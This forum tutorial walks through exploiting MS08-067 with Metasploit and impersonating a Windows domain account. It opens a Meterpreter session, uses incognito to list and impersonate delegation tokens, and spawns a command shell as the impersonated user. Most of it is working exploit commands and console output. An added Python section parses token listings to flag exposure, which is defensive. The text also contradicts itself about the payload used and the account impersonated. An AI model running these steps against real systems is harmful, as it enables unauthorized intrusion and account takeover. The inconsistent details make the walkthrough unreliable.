Forum Thread: Impersonation of Users Using Metasploit (Old but Effective)

Now we will see how to impersonate a system user without having to create a new user with administrator permissions.
First, let's suppose that we have already entered the PC with an exploit such as:

  • exploit/windows/smb/ms08_067_netapi

and with a PAYLOAD such as:

  • windows/vncinject/bind_tcp

In this case we will use the PAYLOAD windows/shell/bind_tcp. I will not explain it much, because many already know it.
Code:
msfconsole


=[ metasploit v3.3.2-release [core:3.3 api:1.0]
+ -- --=[ 462 exploits - 219 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
=[ svn r7808 updated 16 days ago (2009.12.10)

Warning: This copy of the Metasploit Framework was last updated 16 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://dev.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:Spanish
[*] Selected Target: Windows XP SP2 Spanish (NX)
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.2:4661 -> 192.168.0.3:4444)

meterpreter >

  • After obtaining the Meterpreter session, we load the incognito extension with the use command:

meterpreter > use incognito
Loading extension incognito...success.
meterpreter >

  • We look at what commands it offers:

Code:
meterpreter > help

Incognito Commands
==================

Command              Description
-------              -----------
add_group_user       Attempt to add a user to a global group with all tokens
add_localgroup_user  Attempt to add a user to a local group with all tokens
add_user             Attempt to add a user with all tokens
impersonate_token    Impersonate specified token
list_tokens          List tokens available under current user context
snarf_hashes         Snarf challenge/response hashes for every token

meterpreter >

  • We will use the list_tokens command, but first let's see what parameters it accepts:

Code:
meterpreter > list_tokens

Usage: list_tokens <list_order_option>

Lists all accessible tokens and their privilege level

OPTIONS:

-g List tokens by unique groupname
-u List tokens by unique username

meterpreter >

  • Now we list the users whose tokens exist on the system:

Code:

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
COLTEJER\ServerColtejer
NT AUTHORITY\Servicio de red
NT AUTHORITY\SERVICIO LOCAL
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

meterpreter >
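As an added example that is not from the original post, here is a small Python parser for the list_tokens -u output above. It separates delegation tokens (usable for network authentication to other hosts) from impersonation tokens (valid only on the local machine) and flags the delegation tokens of non-built-in accounts, which is the exposure an administrator reviewing such a host wants to remove. The built-in account list, including the Spanish localized names, is my assumption.

```python
import re
# Constructed sample: the list_tokens -u output shown above (Spanish XP host).
SAMPLE_OUTPUT = """\
Delegation Tokens Available
========================================
COLTEJER\\ServerColtejer
NT AUTHORITY\\Servicio de red
NT AUTHORITY\\SERVICIO LOCAL
NT AUTHORITY\\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\\ANONYMOUS LOGON
"""

# Assumed list of built-in service principals (English plus the Spanish names seen
# on this host). Their tokens grant local rights only, unlike user/computer accounts.
BUILTIN_ACCOUNTS = {
    "nt authority\\system", "nt authority\\anonymous logon",
    "nt authority\\network service", "nt authority\\servicio de red",
    "nt authority\\local service", "nt authority\\servicio local",
}

SECTION_RE = re.compile(r"^(Delegation|Impersonation) Tokens Available$")

def parse_list_tokens(text):
    """Split list_tokens output into {'delegation': [...], 'impersonation': [...]}."""
    tokens = {"delegation": [], "impersonation": []}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("="):   # blank line or ==== rule
            continue
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1).lower()
        elif current and "\\" in line:        # DOMAIN\user entry
            tokens[current].append(line)
    return tokens

def exposure_report(text):
    """Delegation tokens of non-built-in accounts are the ones reusable against other hosts."""
    tokens = parse_list_tokens(text)
    return {
        "delegation": tokens["delegation"],
        "impersonation": tokens["impersonation"],
        "reusable_accounts": [t for t in tokens["delegation"] if t.lower() not in BUILTIN_ACCOUNTS],
        "system_token_present": any(t.lower() == "nt authority\\system" for t in tokens["delegation"]),
    }
```

On the sample above the report flags COLTEJER\ServerColtejer as the only delegation token belonging to a real account, alongside the SYSTEM token.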

  • Now comes the moment when we are going to impersonate a user.

Code:
meterpreter > impersonate_token COLTEJER\\ServerColtejer
[+] Delegation token available
[+] Successfully impersonated user COLTEJER\ServerColtejer

meterpreter >

  • Open a console (remote shell) as the impersonated user. In this case the user is ayman\Serverayman.

Code:
meterpreter > execute -f cmd.exe -i -t
Process 1528 created.
Channel 1 created.
Microsoft Windows XP Versión 5.1.2600
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
